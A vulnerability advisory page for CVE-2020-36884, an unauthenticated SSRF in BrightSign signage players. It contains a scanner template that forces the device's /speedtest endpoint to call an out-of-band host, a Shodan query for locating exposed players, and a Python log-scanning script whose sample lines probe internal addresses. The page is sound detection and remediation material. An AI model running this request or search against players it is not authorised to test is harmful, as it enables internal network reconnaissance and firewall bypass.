BrightSign Digital Signage 8.2.26 - Server-Side Request Forgery

CVE-2020-36884
Verified

Description

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player, affecting the Diagnostic Web Server (DWS). The application parses user-supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service.

Severity

Medium

Exploit Probability

1%

Published Date

August 31, 2022

Template Author

0x_akoko

CVE-2020-36884.yaml
id: CVE-2020-36884

info:
  name: BrightSign Digital Signage 8.2.26 - Server-Side Request Forgery
  author: 0x_Akoko
  severity: medium
  description: |
    Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service.
  impact: |
    Attackers can bypass firewalls and enumerate internal network hosts by forcing arbitrary HTTP requests.
  remediation: |
    Update to a version later than 8.2.26 or the latest available version.
  reference:
    - https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595
    - https://www.zeroscience.mk/codes/brightsign_ssrf.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36884
  classification:
    cve-id: CVE-2020-36884
    epss-score: 0.0083
    epss-percentile: 0.52593
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"BrightSign"
  tags: cve,cve2020,ssrf,brightsign,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/speedtest?url={{interactsh-url}}'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: dsl
        dsl:
          - 'contains(body_1, "Downloaded")'
# digest: 4b0a00483046022100ff1bc0934648d733615222183b1a3dca4613e5bf15351790977570154498b7220221008e7dc267ed8ad7f267f62ff057356163a0e7fd14bb423f53414d21c9cb8edcc7:922c64590222798bb761d5b6d8e72950

CVSS Metrics

Severity: 5.0
CVE ID: CVE-2020-36884
CWE ID: CWE-918

References

https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595
https://www.zeroscience.mk/codes/brightsign_ssrf.txt
https://nvd.nist.gov/vuln/detail/CVE-2020-36884

Remediation Steps

Update to a version later than 8.2.26 or the latest available version.
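
Until players are updated, requests to the DWS /speedtest endpoint that carry a 'url' parameter are the signal to look for in traffic logs. The following is an added example, not part of the template or of BrightSign's code: it scans access-log lines for such requests and labels the destination each one asked the player to fetch. The log format, the sample lines and the function names are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (assumed to come from a
# reverse proxy or capture in front of the player; not real DWS output).
SAMPLE_LOG = """\
203.0.113.7 - - [31/Aug/2022:10:01:02 +0000] "GET /speedtest?url=http%3A%2F%2F192.168.1.10%3A8080%2F HTTP/1.1" 200 512
203.0.113.7 - - [31/Aug/2022:10:01:05 +0000] "GET /speedtest?url=http://127.0.0.1:22/ HTTP/1.1" 200 498
198.51.100.4 - - [31/Aug/2022:10:02:11 +0000] "GET /speedtest?url=http://example.com/test.bin HTTP/1.1" 200 530
198.51.100.4 - - [31/Aug/2022:10:03:40 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"GET (\S+) HTTP/[\d.]+"')

def classify_target(target):
    """Label the host in a speedtest 'url' value: internal, external or hostname."""
    host = urlsplit(target if "//" in target else "//" + target).hostname
    if not host:
        return "unparsable"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"  # needs DNS resolution to judge; flag for review
    internal = ip.is_private or ip.is_loopback or ip.is_link_local
    return "internal" if internal else "external"

def find_speedtest_requests(log_text):
    """Return (client, target, label) for every /speedtest request carrying 'url'."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, request_uri = m.groups()
        parts = urlsplit(request_uri)
        if parts.path != "/speedtest":
            continue
        # parse_qs percent-decodes the value, so encoded targets are caught too
        for target in parse_qs(parts.query).get("url", []):
            findings.append((client, target, classify_target(target)))
    return findings

if __name__ == "__main__":
    for client, target, label in find_speedtest_requests(SAMPLE_LOG):
        print(f"{client} -> {target} [{label}]")
```

Any hit labelled "internal" means the player was asked to reach an address behind the firewall; "hostname" hits need the name resolved before they can be judged.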